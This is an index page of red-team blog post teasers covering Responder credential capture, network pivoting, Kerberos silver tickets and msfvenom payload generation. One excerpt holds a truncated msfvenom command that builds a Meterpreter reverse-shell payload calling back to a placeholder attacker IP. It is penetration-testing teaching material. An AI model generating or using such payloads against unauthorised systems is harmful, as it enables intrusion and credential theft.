Red team

thumbnail
Responder - Ultimate Guide

Notes Responder - Ultimate Guide Responder - Info Github Repo Introduction from aptive Some info from NotSoSecure Whats is a LLMNR...

thumbnail
Responder - UNC Path Injection with Image Linking (Thomas Elling)

Notes Responder - Ultimate Guide Responder - Info Github Repo Orginal Blog post by Thomas Elling Microsoft Word is an excellent at...

thumbnail
Responder - WPAD Proxy Server (Mucahit Karadag)

Notes Responder - Ultimate Guide Responder - Info Github Repo Orginal Blog post by Mucahit Karadag What is WPAD? Organisations all...

thumbnail
Pivoting - ssh Local Port forwarding

In part one of the SSH pivoting guide, I’ll provide a detailed (pedantic) guide of the easiest form of pivoting which is dep...

thumbnail
Pivoting through networks

What is Pivoting ? Being able to access networks that we do not have access to by using a compromised server. You can there for ac...

thumbnail
Pivoting - SShuttle

Transparent proxy server that works as a poor man’s VPN. Forwards over ssh. Doesn’t require admin. Works with Linux an...

thumbnail
Pivoting - Proxychains

Dynamic Port Forwarding is the third major method of port redirection with SSH. Where as previously both local and remote port for...

thumbnail
Pivoting - Meterpreter

As seen in the above topology, the device that has two NICs has access to the both 192.168.1.0/24 and 192.168.10.0/24 networks. Un...

thumbnail
How Attackers Use Kerberos Silver Tickets to Exploit Systems

By Sean Metcalf in ActiveDirectorySecurity, Microsoft Security, Technical Reading, Technical Reference Usually Golden Tickets (for...

thumbnail
Generating Payloads with MsfVenom

LIST PAYLOADS BINARIES Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Co...

KSEC Labs